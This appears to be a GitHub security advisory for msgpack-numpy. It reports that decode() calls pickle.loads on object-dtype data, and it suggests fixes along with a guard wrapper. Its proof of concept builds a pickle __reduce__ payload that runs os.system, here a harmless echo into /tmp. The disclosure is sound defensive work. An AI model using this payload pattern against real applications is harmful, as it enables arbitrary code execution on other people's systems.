Security: Arbitrary Code Execution via pickle.loads in decode() when kind='O' #57

@gps949

Summary

The decode() function in msgpack_numpy/__init__.py (line 99) calls pickle.loads(obj[b'data']) without any safety checks when deserializing numpy arrays with dtype='O' (Object). This allows arbitrary code execution when loading untrusted msgpack data serialized with msgpack-numpy.

Vulnerable Code

# msgpack_numpy/__init__.py, lines 83-99 (excerpt)
def decode(obj, chain=None):
    try:
        if b'nd' in obj:
            if obj[b'nd'] is True:
                if b'kind' in obj and obj[b'kind'] == b'O':
                    return pickle.loads(obj[b'data'])  # <-- VULNERABLE

Proof of Concept

import msgpack
import msgpack_numpy
import pickle
import os

# Create malicious pickle payload
class Exploit:
    def __reduce__(self):
        return (os.system, ("echo RCE_CONFIRMED > /tmp/pwned.txt",))

# Craft malicious msgpack data
payload = {
    b'nd': True,
    b'kind': b'O',
    b'data': pickle.dumps(Exploit()),
    b'shape': (1,),
    b'type': b'O'
}

packed = msgpack.packb(payload)

# Trigger RCE
result = msgpack_numpy.unpackb(packed)
# /tmp/pwned.txt is now created

Impact

Any application that uses msgpack_numpy.unpackb(), msgpack_numpy.loads(), or msgpack.unpackb() with msgpack_numpy.decode as object_hook to deserialize untrusted data is vulnerable to arbitrary code execution.

Suggested Fix

  1. Remove pickle.loads entirely and raise an error for Object dtype arrays
  2. Or add an allow_pickle parameter (similar to numpy's approach) that defaults to False
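
A minimal sketch of what such a guard could look like, written as a wrapper around an object hook rather than as a patch to the library. The names `make_guarded_hook` and `fake_decode` are hypothetical and not part of msgpack-numpy; `fake_decode` stands in for `msgpack_numpy.decode` so the example runs without third-party packages. The check only covers the bytes-keyed layout shown in the excerpt above.

```python
import pickle


def make_guarded_hook(inner_hook, allow_pickle=False):
    """Wrap an object hook so pickled object-dtype payloads are refused.

    Hypothetical helper for illustration; not part of msgpack-numpy.
    """
    def guarded_hook(obj):
        # Same conditions the vulnerable branch tests before calling pickle.loads.
        is_pickled_array = (
            isinstance(obj, dict)
            and obj.get(b'nd') is True
            and obj.get(b'kind') == b'O'
        )
        if is_pickled_array and not allow_pickle:
            raise ValueError(
                "refusing to unpickle an object-dtype array; "
                "pass allow_pickle=True only for trusted data"
            )
        return inner_hook(obj)
    return guarded_hook


def fake_decode(obj):
    # Stand-in for msgpack_numpy.decode (assumption made for this sketch only).
    return obj


hook = make_guarded_hook(fake_decode)

benign = {b'nd': True, b'kind': b'', b'type': b'<f8',
          b'shape': (1,), b'data': b'\x00' * 8}
malicious = {b'nd': True, b'kind': b'O', b'data': pickle.dumps([1, 2, 3])}

# Non-object payloads pass through to the inner hook unchanged.
passed_through = hook(benign)

# Object-dtype payloads are rejected before any unpickling happens.
try:
    hook(malicious)
    blocked = False
except ValueError:
    blocked = True
```

Until a fix lands, a caller could presumably apply the same idea by passing `make_guarded_hook(msgpack_numpy.decode)` as the `object_hook` argument to `msgpack.unpackb()`, instead of calling `msgpack_numpy.unpackb()` directly. Defaulting to rejection mirrors option 2: callers must opt in explicitly for data they trust.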

CWE

CWE-502: Deserialization of Untrusted Data

CVSS

7.8 (High) - AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
